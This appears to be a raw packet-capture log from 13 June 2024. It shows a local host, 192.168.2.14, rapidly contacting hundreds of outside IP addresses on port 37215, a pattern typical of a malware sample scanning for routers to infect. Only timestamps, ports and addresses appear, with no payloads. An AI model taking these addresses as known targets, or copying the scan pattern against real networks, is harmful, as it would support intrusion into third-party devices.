                                                        Jun 13, 2024 21:31:59.223128080 CEST3721543750156.66.100.2192.168.2.14
                                                        Jun 13, 2024 21:31:59.223167896 CEST4375037215192.168.2.14156.66.100.2
                                                        Jun 13, 2024 21:31:59.223191977 CEST3721550334156.72.43.213192.168.2.14
                                                        Jun 13, 2024 21:31:59.223251104 CEST5033437215192.168.2.14156.72.43.213
                                                        Jun 13, 2024 21:31:59.223330021 CEST372154394441.84.31.129192.168.2.14
                                                        Jun 13, 2024 21:31:59.223371029 CEST4394437215192.168.2.1441.84.31.129
                                                        Jun 13, 2024 21:31:59.223500967 CEST3721555700156.83.50.249192.168.2.14
                                                        Jun 13, 2024 21:31:59.223572969 CEST5570037215192.168.2.14156.83.50.249
                                                        Jun 13, 2024 21:31:59.223843098 CEST372153999641.31.170.60192.168.2.14
                                                        Jun 13, 2024 21:31:59.223881006 CEST3999637215192.168.2.1441.31.170.60
                                                        Jun 13, 2024 21:31:59.223944902 CEST3721558412156.52.58.71192.168.2.14
                                                        Jun 13, 2024 21:31:59.223994970 CEST5841237215192.168.2.14156.52.58.71
                                                        Jun 13, 2024 21:31:59.224035025 CEST3721550968156.137.82.107192.168.2.14
                                                        Jun 13, 2024 21:31:59.224073887 CEST5096837215192.168.2.14156.137.82.107
                                                        Jun 13, 2024 21:31:59.224232912 CEST372153801441.184.239.229192.168.2.14
                                                        Jun 13, 2024 21:31:59.224246025 CEST3721558918156.222.68.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.224273920 CEST3801437215192.168.2.1441.184.239.229
                                                        Jun 13, 2024 21:31:59.224273920 CEST5891837215192.168.2.14156.222.68.8
                                                        Jun 13, 2024 21:31:59.224423885 CEST3721534760156.252.191.201192.168.2.14
                                                        Jun 13, 2024 21:31:59.224468946 CEST3476037215192.168.2.14156.252.191.201
                                                        Jun 13, 2024 21:31:59.224734068 CEST372155744441.39.234.106192.168.2.14
                                                        Jun 13, 2024 21:31:59.224781990 CEST5744437215192.168.2.1441.39.234.106
                                                        Jun 13, 2024 21:31:59.224885941 CEST3721537428156.203.240.233192.168.2.14
                                                        Jun 13, 2024 21:31:59.224948883 CEST3721541262156.209.60.71192.168.2.14
                                                        Jun 13, 2024 21:31:59.224955082 CEST3742837215192.168.2.14156.203.240.233
                                                        Jun 13, 2024 21:31:59.224994898 CEST4126237215192.168.2.14156.209.60.71
                                                        Jun 13, 2024 21:31:59.225171089 CEST3721558602156.88.172.221192.168.2.14
                                                        Jun 13, 2024 21:31:59.225214005 CEST5860237215192.168.2.14156.88.172.221
                                                        Jun 13, 2024 21:31:59.226411104 CEST372154705241.134.130.152192.168.2.14
                                                        Jun 13, 2024 21:31:59.226453066 CEST4705237215192.168.2.1441.134.130.152
                                                        Jun 13, 2024 21:31:59.226471901 CEST372155677041.73.140.186192.168.2.14
                                                        Jun 13, 2024 21:31:59.226500988 CEST3721560472156.112.130.200192.168.2.14
                                                        Jun 13, 2024 21:31:59.226519108 CEST5677037215192.168.2.1441.73.140.186
                                                        Jun 13, 2024 21:31:59.226536036 CEST6047237215192.168.2.14156.112.130.200
                                                        Jun 13, 2024 21:31:59.226780891 CEST372155740041.210.189.234192.168.2.14
                                                        Jun 13, 2024 21:31:59.226820946 CEST5740037215192.168.2.1441.210.189.234
                                                        Jun 13, 2024 21:31:59.226843119 CEST3721537948197.42.1.88192.168.2.14
                                                        Jun 13, 2024 21:31:59.226881027 CEST3794837215192.168.2.14197.42.1.88
                                                        Jun 13, 2024 21:31:59.227163076 CEST372153573041.83.124.1192.168.2.14
                                                        Jun 13, 2024 21:31:59.227202892 CEST3573037215192.168.2.1441.83.124.1
                                                        Jun 13, 2024 21:31:59.227242947 CEST372154323641.169.161.144192.168.2.14
                                                        Jun 13, 2024 21:31:59.227283955 CEST4323637215192.168.2.1441.169.161.144
                                                        Jun 13, 2024 21:31:59.227962017 CEST3721549784156.144.57.76192.168.2.14
                                                        Jun 13, 2024 21:31:59.227997065 CEST4978437215192.168.2.14156.144.57.76
                                                        Jun 13, 2024 21:31:59.228153944 CEST372153847241.20.0.38192.168.2.14
                                                        Jun 13, 2024 21:31:59.228193045 CEST3847237215192.168.2.1441.20.0.38
                                                        Jun 13, 2024 21:31:59.228261948 CEST3721548752156.99.248.102192.168.2.14
                                                        Jun 13, 2024 21:31:59.228300095 CEST4875237215192.168.2.14156.99.248.102
                                                        Jun 13, 2024 21:31:59.228743076 CEST3721555006156.146.188.155192.168.2.14
                                                        Jun 13, 2024 21:31:59.228784084 CEST5500637215192.168.2.14156.146.188.155
                                                        Jun 13, 2024 21:31:59.229211092 CEST3721538440197.145.154.253192.168.2.14
                                                        Jun 13, 2024 21:31:59.229249954 CEST3844037215192.168.2.14197.145.154.253
                                                        Jun 13, 2024 21:31:59.229278088 CEST3721555844156.237.117.182192.168.2.14
                                                        Jun 13, 2024 21:31:59.229443073 CEST3721537086197.192.218.206192.168.2.14
                                                        Jun 13, 2024 21:31:59.229450941 CEST5584437215192.168.2.14156.237.117.182
                                                        Jun 13, 2024 21:31:59.229489088 CEST3708637215192.168.2.14197.192.218.206
                                                        Jun 13, 2024 21:31:59.229690075 CEST3721553902197.116.183.242192.168.2.14
                                                        Jun 13, 2024 21:31:59.229736090 CEST5390237215192.168.2.14197.116.183.242
                                                        Jun 13, 2024 21:31:59.229887962 CEST3721545226197.235.39.79192.168.2.14
                                                        Jun 13, 2024 21:31:59.229928970 CEST4522637215192.168.2.14197.235.39.79
                                                        Jun 13, 2024 21:31:59.230231047 CEST3721536884156.164.61.20192.168.2.14
                                                        Jun 13, 2024 21:31:59.230271101 CEST3688437215192.168.2.14156.164.61.20
                                                        Jun 13, 2024 21:31:59.230289936 CEST3721548706156.238.222.107192.168.2.14
                                                        Jun 13, 2024 21:31:59.230329990 CEST4870637215192.168.2.14156.238.222.107
                                                        Jun 13, 2024 21:31:59.230489016 CEST3721534344156.165.95.110192.168.2.14
                                                        Jun 13, 2024 21:31:59.230526924 CEST3434437215192.168.2.14156.165.95.110
                                                        Jun 13, 2024 21:31:59.231070042 CEST3721558816156.45.190.231192.168.2.14
                                                        Jun 13, 2024 21:31:59.231082916 CEST3721537746197.209.154.175192.168.2.14
                                                        Jun 13, 2024 21:31:59.231118917 CEST3774637215192.168.2.14197.209.154.175
                                                        Jun 13, 2024 21:31:59.231120110 CEST5881637215192.168.2.14156.45.190.231
                                                        Jun 13, 2024 21:31:59.231473923 CEST3721555618197.232.150.242192.168.2.14
                                                        Jun 13, 2024 21:31:59.231515884 CEST5561837215192.168.2.14197.232.150.242
                                                        Jun 13, 2024 21:31:59.231553078 CEST3721537284156.78.43.67192.168.2.14
                                                        Jun 13, 2024 21:31:59.231642008 CEST3721533566156.10.114.158192.168.2.14
                                                        Jun 13, 2024 21:31:59.232016087 CEST372155280441.111.224.37192.168.2.14
                                                        Jun 13, 2024 21:31:59.232059002 CEST372154938041.72.198.137192.168.2.14
                                                        Jun 13, 2024 21:31:59.232275963 CEST372155171041.55.60.186192.168.2.14
                                                        Jun 13, 2024 21:31:59.232721090 CEST3721552912156.210.147.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.232844114 CEST372153311041.112.54.198192.168.2.14
                                                        Jun 13, 2024 21:31:59.232856989 CEST372155634041.98.175.117192.168.2.14
                                                        Jun 13, 2024 21:31:59.232938051 CEST3721556732156.156.109.129192.168.2.14
                                                        Jun 13, 2024 21:31:59.233172894 CEST3721537694197.15.134.113192.168.2.14
                                                        Jun 13, 2024 21:31:59.233818054 CEST3721559770156.30.164.95192.168.2.14
                                                        Jun 13, 2024 21:31:59.233830929 CEST372153974241.32.17.23192.168.2.14
                                                        Jun 13, 2024 21:31:59.233843088 CEST372155623441.198.252.189192.168.2.14
                                                        Jun 13, 2024 21:31:59.233918905 CEST3721552552197.6.83.65192.168.2.14
                                                        Jun 13, 2024 21:31:59.234178066 CEST3721556194156.66.12.61192.168.2.14
                                                        Jun 13, 2024 21:31:59.234478951 CEST3721541214156.87.33.240192.168.2.14
                                                        Jun 13, 2024 21:31:59.234509945 CEST372154966641.67.82.18192.168.2.14
                                                        Jun 13, 2024 21:31:59.234673977 CEST372155386041.38.41.192192.168.2.14
                                                        Jun 13, 2024 21:31:59.234911919 CEST3721553062197.251.142.134192.168.2.14
                                                        Jun 13, 2024 21:31:59.234925032 CEST3721537438197.218.101.123192.168.2.14
                                                        Jun 13, 2024 21:31:59.235048056 CEST3721536180197.163.130.107192.168.2.14
                                                        Jun 13, 2024 21:31:59.235522032 CEST372154354641.55.174.73192.168.2.14
                                                        Jun 13, 2024 21:31:59.235954046 CEST372153418841.30.13.4192.168.2.14
                                                        Jun 13, 2024 21:31:59.236057997 CEST3721541780197.155.238.189192.168.2.14
                                                        Jun 13, 2024 21:31:59.236294031 CEST372154407041.74.74.126192.168.2.14
                                                        Jun 13, 2024 21:31:59.236474991 CEST3721536118197.212.142.4192.168.2.14
                                                        Jun 13, 2024 21:31:59.236566067 CEST3721540116197.207.130.124192.168.2.14
                                                        Jun 13, 2024 21:31:59.236684084 CEST3721560832197.216.251.19192.168.2.14
                                                        Jun 13, 2024 21:31:59.237087011 CEST3721552662156.34.21.252192.168.2.14
                                                        Jun 13, 2024 21:31:59.237101078 CEST372155333641.219.126.242192.168.2.14
                                                        Jun 13, 2024 21:31:59.237112999 CEST372155092441.167.6.76192.168.2.14
                                                        Jun 13, 2024 21:31:59.237319946 CEST3721552380156.70.115.159192.168.2.14
                                                        Jun 13, 2024 21:31:59.237346888 CEST372156067441.78.199.140192.168.2.14
                                                        Jun 13, 2024 21:31:59.237462997 CEST3721557616156.87.247.69192.168.2.14
                                                        Jun 13, 2024 21:31:59.237641096 CEST372153309041.2.55.158192.168.2.14
                                                        Jun 13, 2024 21:31:59.237905979 CEST3721560660156.218.4.34192.168.2.14
                                                        Jun 13, 2024 21:31:59.238075018 CEST3721547912197.67.9.14192.168.2.14
                                                        Jun 13, 2024 21:31:59.238373995 CEST372153541641.140.121.217192.168.2.14
                                                        Jun 13, 2024 21:31:59.238388062 CEST3721541006156.209.60.71192.168.2.14
                                                        Jun 13, 2024 21:31:59.238399982 CEST372155479441.236.174.219192.168.2.14
                                                        Jun 13, 2024 21:31:59.238662958 CEST3721535132156.249.24.102192.168.2.14
                                                        Jun 13, 2024 21:31:59.238854885 CEST372154239641.172.177.215192.168.2.14
                                                        Jun 13, 2024 21:31:59.239028931 CEST372153764441.98.48.97192.168.2.14
                                                        Jun 13, 2024 21:31:59.239042997 CEST3721548652156.51.238.240192.168.2.14
                                                        Jun 13, 2024 21:31:59.239348888 CEST3721543650156.247.65.190192.168.2.14
                                                        Jun 13, 2024 21:31:59.239480019 CEST3721556798156.192.228.40192.168.2.14
                                                        Jun 13, 2024 21:31:59.239506960 CEST372155922241.181.213.184192.168.2.14
                                                        Jun 13, 2024 21:31:59.239672899 CEST3721548390156.132.151.48192.168.2.14
                                                        Jun 13, 2024 21:31:59.240080118 CEST3721535620197.74.195.55192.168.2.14
                                                        Jun 13, 2024 21:31:59.240391016 CEST372153438841.8.46.108192.168.2.14
                                                        Jun 13, 2024 21:31:59.241034985 CEST3721532994156.178.175.24192.168.2.14
                                                        Jun 13, 2024 21:31:59.241451979 CEST3721560366156.58.220.239192.168.2.14
                                                        Jun 13, 2024 21:31:59.241807938 CEST3721551862197.36.55.1192.168.2.14
                                                        Jun 13, 2024 21:31:59.241900921 CEST3721538906197.40.176.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.242194891 CEST3721540352197.180.35.86192.168.2.14
                                                        Jun 13, 2024 21:31:59.242361069 CEST3721533988156.141.134.112192.168.2.14
                                                        Jun 13, 2024 21:31:59.242618084 CEST3721556970156.96.157.43192.168.2.14
                                                        Jun 13, 2024 21:31:59.242903948 CEST372155827841.187.7.24192.168.2.14
                                                        Jun 13, 2024 21:31:59.243093967 CEST3721550224197.187.191.53192.168.2.14
                                                        Jun 13, 2024 21:31:59.243472099 CEST3721540710197.142.93.6192.168.2.14
                                                        Jun 13, 2024 21:31:59.243486881 CEST3721554426156.207.60.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.243573904 CEST372155989241.1.47.57192.168.2.14
                                                        Jun 13, 2024 21:31:59.243740082 CEST372153760641.231.104.194192.168.2.14
                                                        Jun 13, 2024 21:31:59.243992090 CEST3721536920156.77.39.5192.168.2.14
                                                        Jun 13, 2024 21:31:59.244152069 CEST3721554294156.8.228.71192.168.2.14
                                                        Jun 13, 2024 21:31:59.244317055 CEST3721543894197.161.140.105192.168.2.14
                                                        Jun 13, 2024 21:31:59.244642973 CEST3721543540197.122.188.250192.168.2.14
                                                        Jun 13, 2024 21:31:59.244689941 CEST372154278041.124.145.165192.168.2.14
                                                        Jun 13, 2024 21:31:59.245253086 CEST372155922641.89.98.0192.168.2.14
                                                        Jun 13, 2024 21:31:59.245265961 CEST372154264241.2.128.246192.168.2.14
                                                        Jun 13, 2024 21:31:59.245277882 CEST3721553248197.195.180.119192.168.2.14
                                                        Jun 13, 2024 21:31:59.245389938 CEST3721556362156.35.158.141192.168.2.14
                                                        Jun 13, 2024 21:31:59.245605946 CEST372155810041.26.181.224192.168.2.14
                                                        Jun 13, 2024 21:31:59.245815992 CEST3721542270156.13.175.64192.168.2.14
                                                        Jun 13, 2024 21:31:59.246022940 CEST3721558830156.115.1.221192.168.2.14
                                                        Jun 13, 2024 21:31:59.246148109 CEST3721544694197.52.185.92192.168.2.14
                                                        Jun 13, 2024 21:31:59.246582031 CEST3721532938197.171.201.221192.168.2.14
                                                        Jun 13, 2024 21:31:59.247020960 CEST372155125441.29.99.140192.168.2.14
                                                        Jun 13, 2024 21:31:59.247148037 CEST3721538868197.103.31.12192.168.2.14
                                                        Jun 13, 2024 21:31:59.247566938 CEST3721549718197.221.63.142192.168.2.14
                                                        Jun 13, 2024 21:31:59.247581959 CEST3721553142156.131.45.177192.168.2.14
                                                        Jun 13, 2024 21:31:59.247592926 CEST3721546058156.52.65.236192.168.2.14
                                                        Jun 13, 2024 21:31:59.247836113 CEST372155854241.160.6.160192.168.2.14
                                                        Jun 13, 2024 21:31:59.248300076 CEST372154830241.11.160.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.248320103 CEST3721544660156.234.131.16192.168.2.14
                                                        Jun 13, 2024 21:31:59.248486996 CEST372155531241.84.165.58192.168.2.14
                                                        Jun 13, 2024 21:31:59.248780966 CEST3721540774156.14.18.99192.168.2.14
                                                        Jun 13, 2024 21:31:59.248934031 CEST372155436641.91.46.56192.168.2.14
                                                        Jun 13, 2024 21:31:59.249026060 CEST3721559522156.93.196.251192.168.2.14
                                                        Jun 13, 2024 21:31:59.249247074 CEST372153987041.17.85.190192.168.2.14
                                                        Jun 13, 2024 21:31:59.249624968 CEST3721545706156.167.30.215192.168.2.14
                                                        Jun 13, 2024 21:31:59.249994993 CEST3721537464156.78.43.67192.168.2.14
                                                        Jun 13, 2024 21:31:59.250042915 CEST3746437215192.168.2.14156.78.43.67
                                                        Jun 13, 2024 21:31:59.250401974 CEST3721533746156.10.114.158192.168.2.14
                                                        Jun 13, 2024 21:31:59.250493050 CEST372155298241.111.224.37192.168.2.14
                                                        Jun 13, 2024 21:31:59.250555038 CEST3374637215192.168.2.14156.10.114.158
                                                        Jun 13, 2024 21:31:59.250579119 CEST5298237215192.168.2.1441.111.224.37
                                                        Jun 13, 2024 21:31:59.250695944 CEST372155189241.55.60.186192.168.2.14
                                                        Jun 13, 2024 21:31:59.250710011 CEST372154956041.72.198.137192.168.2.14
                                                        Jun 13, 2024 21:31:59.250741005 CEST5189237215192.168.2.1441.55.60.186
                                                        Jun 13, 2024 21:31:59.251182079 CEST3721553092156.210.147.248192.168.2.14
                                                        Jun 13, 2024 21:31:59.251205921 CEST4956037215192.168.2.1441.72.198.137
                                                        Jun 13, 2024 21:31:59.251230001 CEST5309237215192.168.2.14156.210.147.248
                                                        Jun 13, 2024 21:31:59.251241922 CEST372153329041.112.54.198192.168.2.14
                                                        Jun 13, 2024 21:31:59.251282930 CEST3329037215192.168.2.1441.112.54.198
                                                        Jun 13, 2024 21:31:59.251470089 CEST3721556912156.156.109.129192.168.2.14
                                                        Jun 13, 2024 21:31:59.251511097 CEST5691237215192.168.2.14156.156.109.129
                                                        Jun 13, 2024 21:31:59.251818895 CEST372155652041.98.175.117192.168.2.14
                                                        Jun 13, 2024 21:31:59.251832962 CEST3721537874197.15.134.113192.168.2.14
                                                        Jun 13, 2024 21:31:59.251872063 CEST3787437215192.168.2.14197.15.134.113
                                                        Jun 13, 2024 21:31:59.252047062 CEST3721559950156.30.164.95192.168.2.14
                                                        Jun 13, 2024 21:31:59.252060890 CEST372153992241.32.17.23192.168.2.14
                                                        Jun 13, 2024 21:31:59.252084017 CEST3721556374156.66.12.61192.168.2.14
                                                        Jun 13, 2024 21:31:59.252121925 CEST5637437215192.168.2.14156.66.12.61
                                                        Jun 13, 2024 21:31:59.252286911 CEST5652037215192.168.2.1441.98.175.117
                                                        Jun 13, 2024 21:31:59.252286911 CEST5995037215192.168.2.14156.30.164.95
                                                        Jun 13, 2024 21:31:59.252286911 CEST3992237215192.168.2.1441.32.17.23
                                                        Jun 13, 2024 21:31:59.252347946 CEST372155641441.198.252.189192.168.2.14
                                                        Jun 13, 2024 21:31:59.252361059 CEST3721552732197.6.83.65192.168.2.14
                                                        Jun 13, 2024 21:31:59.252397060 CEST5273237215192.168.2.14197.6.83.65
                                                        Jun 13, 2024 21:31:59.252403021 CEST5641437215192.168.2.1441.198.252.189
                                                        Jun 13, 2024 21:31:59.252705097 CEST3721541394156.87.33.240192.168.2.14
                                                        Jun 13, 2024 21:31:59.252965927 CEST372155404041.38.41.192192.168.2.14
                                                        Jun 13, 2024 21:31:59.253029108 CEST5404037215192.168.2.1441.38.41.192
                                                        Jun 13, 2024 21:31:59.253237963 CEST372154984641.67.82.18192.168.2.14
                                                        Jun 13, 2024 21:31:59.253341913 CEST4984637215192.168.2.1441.67.82.18
                                                        Jun 13, 2024 21:31:59.253345013 CEST4139437215192.168.2.14156.87.33.240
                                                        Jun 13, 2024 21:31:59.253438950 CEST3721553242197.251.142.134192.168.2.14
                                                        Jun 13, 2024 21:31:59.253453016 CEST3721537618197.218.101.123192.168.2.14
                                                        Jun 13, 2024 21:31:59.253464937 CEST3721536360197.163.130.107192.168.2.14
                                                        Jun 13, 2024 21:31:59.253482103 CEST5324237215192.168.2.14197.251.142.134
                                                        Jun 13, 2024 21:31:59.253485918 CEST3761837215192.168.2.14197.218.101.123
                                                        Jun 13, 2024 21:31:59.253500938 CEST3636037215192.168.2.14197.163.130.107
                                                        Jun 13, 2024 21:31:59.253734112 CEST372154372641.55.174.73192.168.2.14
                                                        Jun 13, 2024 21:31:59.253774881 CEST4372637215192.168.2.1441.55.174.73
                                                        Jun 13, 2024 21:31:59.253864050 CEST372153436841.30.13.4192.168.2.14
                                                        Jun 13, 2024 21:31:59.253876925 CEST3721541960197.155.238.189192.168.2.14
                                                        Jun 13, 2024 21:31:59.253902912 CEST3436837215192.168.2.1441.30.13.4
                                                        Jun 13, 2024 21:31:59.253904104 CEST4196037215192.168.2.14197.155.238.189
                                                        Jun 13, 2024 21:31:59.254080057 CEST3721540296197.207.130.124192.168.2.14
                                                        Jun 13, 2024 21:31:59.254120111 CEST4029637215192.168.2.14197.207.130.124
                                                        Jun 13, 2024 21:31:59.254457951 CEST3721536298197.212.142.4192.168.2.14
                                                        Jun 13, 2024 21:31:59.254506111 CEST3629837215192.168.2.14197.212.142.4
                                                        Jun 13, 2024 21:31:59.254611969 CEST372154425041.74.74.126192.168.2.14
                                                        Jun 13, 2024 21:31:59.254839897 CEST3721532780197.216.251.19192.168.2.14
                                                        Jun 13, 2024 21:31:59.254889011 CEST3278037215192.168.2.14197.216.251.19
                                                        Jun 13, 2024 21:31:59.254940987 CEST4425037215192.168.2.1441.74.74.126
                                                        Jun 13, 2024 21:31:59.255263090 CEST3721552842156.34.21.252192.168.2.14
                                                        Jun 13, 2024 21:31:59.255276918 CEST372155351641.219.126.242192.168.2.14
                                                        Jun 13, 2024 21:31:59.255307913 CEST5351637215192.168.2.1441.219.126.242
                                                        Jun 13, 2024 21:31:59.255309105 CEST5284237215192.168.2.14156.34.21.252
                                                        Jun 13, 2024 21:31:59.255592108 CEST372155110441.167.6.76192.168.2.14
                                                        Jun 13, 2024 21:31:59.255605936 CEST3721552560156.70.115.159192.168.2.14
                                                        Jun 13, 2024 21:31:59.255631924 CEST5110437215192.168.2.1441.167.6.76
                                                        Jun 13, 2024 21:31:59.255727053 CEST372156085441.78.199.140192.168.2.14
                                                        Jun 13, 2024 21:31:59.255765915 CEST6085437215192.168.2.1441.78.199.140
                                                        Jun 13, 2024 21:31:59.255789042 CEST5256037215192.168.2.14156.70.115.159
                                                        Jun 13, 2024 21:31:59.255840063 CEST3721557796156.87.247.69192.168.2.14
                                                        Jun 13, 2024 21:31:59.255880117 CEST5779637215192.168.2.14156.87.247.69
                                                        Jun 13, 2024 21:31:59.256175041 CEST372153327041.2.55.158192.168.2.14
                                                        Jun 13, 2024 21:31:59.256216049 CEST3327037215192.168.2.1441.2.55.158
                                                        Jun 13, 2024 21:31:59.256242037 CEST3721560840156.218.4.34192.168.2.14
                                                        Jun 13, 2024 21:31:59.256280899 CEST6084037215192.168.2.14156.218.4.34
                                                        Jun 13, 2024 21:31:59.256433010 CEST372153559641.140.121.217192.168.2.14
                                                        Jun 13, 2024 21:31:59.256474018 CEST3559637215192.168.2.1441.140.121.217
                                                        Jun 13, 2024 21:31:59.256692886 CEST3721548092197.67.9.14192.168.2.14
                                                        Jun 13, 2024 21:31:59.256839991 CEST372155497441.236.174.219192.168.2.14
                                                        Jun 13, 2024 21:31:59.256858110 CEST4809237215192.168.2.14197.67.9.14
                                                        Jun 13, 2024 21:31:59.256880999 CEST5497437215192.168.2.1441.236.174.219
                                                        Jun 13, 2024 21:31:59.257122040 CEST3721535312156.249.24.102192.168.2.14
                                                        Jun 13, 2024 21:31:59.257160902 CEST3531237215192.168.2.14156.249.24.102
                                                        Jun 13, 2024 21:31:59.257287025 CEST372154257641.172.177.215192.168.2.14
                                                        Jun 13, 2024 21:31:59.257328987 CEST4257637215192.168.2.1441.172.177.215
                                                        Jun 13, 2024 21:31:59.257363081 CEST372153782441.98.48.97192.168.2.14
                                                        Jun 13, 2024 21:31:59.257412910 CEST3782437215192.168.2.1441.98.48.97
                                                        Jun 13, 2024 21:31:59.257607937 CEST3721548832156.51.238.240192.168.2.14
                                                        Jun 13, 2024 21:31:59.257680893 CEST4883237215192.168.2.14156.51.238.240
                                                        Jun 13, 2024 21:31:59.257690907 CEST3721543830156.247.65.190192.168.2.14
                                                        Jun 13, 2024 21:31:59.257731915 CEST4383037215192.168.2.14156.247.65.190
                                                        Jun 13, 2024 21:31:59.257750988 CEST3721556978156.192.228.40192.168.2.14
                                                        Jun 13, 2024 21:31:59.257800102 CEST5697837215192.168.2.14156.192.228.40
                                                        Jun 13, 2024 21:31:59.258110046 CEST372155940241.181.213.184192.168.2.14
                                                        Jun 13, 2024 21:31:59.258152962 CEST5940237215192.168.2.1441.181.213.184
                                                        Jun 13, 2024 21:31:59.258446932 CEST3721535800197.74.195.55192.168.2.14
                                                        Jun 13, 2024 21:31:59.258487940 CEST3580037215192.168.2.14197.74.195.55
                                                        Jun 13, 2024 21:31:59.258533955 CEST3721548570156.132.151.48192.168.2.14
                                                        Jun 13, 2024 21:31:59.258548021 CEST372153456841.8.46.108192.168.2.14
                                                        Jun 13, 2024 21:31:59.258559942 CEST3721533174156.178.175.24192.168.2.14
                                                        Jun 13, 2024 21:31:59.258585930 CEST3456837215192.168.2.1441.8.46.108
                                                        Jun 13, 2024 21:31:59.258801937 CEST3721560546156.58.220.239192.168.2.14
                                                        Jun 13, 2024 21:31:59.258842945 CEST6054637215192.168.2.14156.58.220.239
                                                        Jun 13, 2024 21:31:59.258888960 CEST3721552042197.36.55.1192.168.2.14
                                                        Jun 13, 2024 21:31:59.258928061 CEST5204237215192.168.2.14197.36.55.1
                                                        Jun 13, 2024 21:31:59.259015083 CEST4857037215192.168.2.14156.132.151.48
                                                        Jun 13, 2024 21:31:59.259015083 CEST3317437215192.168.2.14156.178.175.24
                                                        Jun 13, 2024 21:31:59.259098053 CEST3721539086197.40.176.8192.168.2.14
                                                        Jun 13, 2024 21:31:59.259332895 CEST3721534166156.141.134.112192.168.2.14
                                                        Jun 13, 2024 21:31:59.259480953 CEST3721540534197.180.35.86192.168.2.14
                                                        Jun 13, 2024 21:31:59.259527922 CEST4053437215192.168.2.14197.180.35.86
                                                        Jun 13, 2024 21:31:59.259568930 CEST3908637215192.168.2.14197.40.176.8
                                                        Jun 13, 2024 21:31:59.259568930 CEST3416637215192.168.2.14156.141.134.112
                                                        Jun 13, 2024 21:31:59.259836912 CEST372155845841.187.7.24192.168.2.14
                                                        Jun 13, 2024 21:31:59.259880066 CEST5845837215192.168.2.1441.187.7.24
                                                        Jun 13, 2024 21:31:59.260059118 CEST3721557150156.96.157.43192.168.2.14
                                                        Jun 13, 2024 21:31:59.260379076 CEST3721550404197.187.191.53192.168.2.14
                                                        Jun 13, 2024 21:31:59.260415077 CEST5040437215192.168.2.14197.187.191.53
                                                        Jun 13, 2024 21:31:59.260502100 CEST5715037215192.168.2.14156.96.157.43
                                                        Jun 13, 2024 21:31:59.261080980 CEST3721540890197.142.93.6192.168.2.14
                                                        Jun 13, 2024 21:31:59.261115074 CEST4089037215192.168.2.14197.142.93.6
                                                        Jun 13, 2024 21:31:59.261568069 CEST3721554606156.207.60.191192.168.2.14
                                                        Jun 13, 2024 21:31:59.261610031 CEST5460637215192.168.2.14156.207.60.191
                                                        Jun 13, 2024 21:31:59.261776924 CEST372156007241.1.47.57192.168.2.14
                                                        Jun 13, 2024 21:31:59.261831045 CEST6007237215192.168.2.1441.1.47.57
                                                        Jun 13, 2024 21:31:59.261842012 CEST372153778641.231.104.194192.168.2.14
                                                        Jun 13, 2024 21:31:59.261883020 CEST3778637215192.168.2.1441.231.104.194
                                                        Jun 13, 2024 21:31:59.261894941 CEST3721537100156.77.39.5192.168.2.14
                                                        Jun 13, 2024 21:31:59.261934042 CEST3710037215192.168.2.14156.77.39.5
                                                        Jun 13, 2024 21:31:59.262094975 CEST3721554474156.8.228.71192.168.2.14
                                                        Jun 13, 2024 21:31:59.262134075 CEST5447437215192.168.2.14156.8.228.71
                                                        Jun 13, 2024 21:31:59.262234926 CEST3721544074197.161.140.105192.168.2.14
                                                        Jun 13, 2024 21:31:59.262274981 CEST4407437215192.168.2.14197.161.140.105
                                                        Jun 13, 2024 21:31:59.262583971 CEST3721543720197.122.188.250192.168.2.14
                                                        Jun 13, 2024 21:31:59.262624025 CEST4372037215192.168.2.14197.122.188.250
                                                        Jun 13, 2024 21:31:59.262692928 CEST372154296041.124.145.165192.168.2.14
                                                        Jun 13, 2024 21:31:59.262741089 CEST4296037215192.168.2.1441.124.145.165
                                                        Jun 13, 2024 21:31:59.262943983 CEST372155940641.89.98.0192.168.2.14
                                                        Jun 13, 2024 21:31:59.262983084 CEST5940637215192.168.2.1441.89.98.0
                                                        Jun 13, 2024 21:31:59.263044119 CEST3721553428197.195.180.119192.168.2.14
                                                        Jun 13, 2024 21:31:59.263083935 CEST5342837215192.168.2.14197.195.180.119
                                                        Jun 13, 2024 21:31:59.263212919 CEST372154282241.2.128.246192.168.2.14
                                                        Jun 13, 2024 21:31:59.263472080 CEST372155828041.26.181.224192.168.2.14
                                                        Jun 13, 2024 21:31:59.263513088 CEST5828037215192.168.2.1441.26.181.224
                                                        Jun 13, 2024 21:31:59.263552904 CEST3721556542156.35.158.141192.168.2.14
                                                        Jun 13, 2024 21:31:59.263570070 CEST4282237215192.168.2.1441.2.128.246
                                                        Jun 13, 2024 21:31:59.263602018 CEST5654237215192.168.2.14156.35.158.141
                                                        Jun 13, 2024 21:31:59.263688087 CEST3721542450156.13.175.64192.168.2.14
                                                        Jun 13, 2024 21:31:59.263731003 CEST4245037215192.168.2.14156.13.175.64
                                                        Jun 13, 2024 21:31:59.263974905 CEST3721559010156.115.1.221192.168.2.14
                                                        Jun 13, 2024 21:31:59.264082909 CEST5901037215192.168.2.14156.115.1.221
                                                        Jun 13, 2024 21:31:59.264203072 CEST372155143441.29.99.140192.168.2.14
                                                        Jun 13, 2024 21:31:59.264339924 CEST5143437215192.168.2.1441.29.99.140
                                                        Jun 13, 2024 21:31:59.264822006 CEST3721544874197.52.185.92192.168.2.14
                                                        Jun 13, 2024 21:31:59.264863968 CEST4487437215192.168.2.14197.52.185.92
                                                        Jun 13, 2024 21:31:59.264931917 CEST3721533118197.171.201.221192.168.2.14
                                                        Jun 13, 2024 21:31:59.265100002 CEST3311837215192.168.2.14197.171.201.221
                                                        Jun 13, 2024 21:31:59.265201092 CEST3721549898197.221.63.142192.168.2.14
                                                        Jun 13, 2024 21:31:59.265240908 CEST4989837215192.168.2.14197.221.63.142
                                                        Jun 13, 2024 21:31:59.265512943 CEST3721539048197.103.31.12192.168.2.14
                                                        Jun 13, 2024 21:31:59.265554905 CEST3904837215192.168.2.14197.103.31.12
                                                        Jun 13, 2024 21:31:59.265809059 CEST3721553322156.131.45.177192.168.2.14
                                                        Jun 13, 2024 21:31:59.265849113 CEST5332237215192.168.2.14156.131.45.177
                                                        Jun 13, 2024 21:31:59.265912056 CEST3721546238156.52.65.236192.168.2.14
                                                        Jun 13, 2024 21:31:59.265954971 CEST4623837215192.168.2.14156.52.65.236
                                                        Jun 13, 2024 21:31:59.266211033 CEST372155872241.160.6.160192.168.2.14
                                                        Jun 13, 2024 21:31:59.266254902 CEST5872237215192.168.2.1441.160.6.160
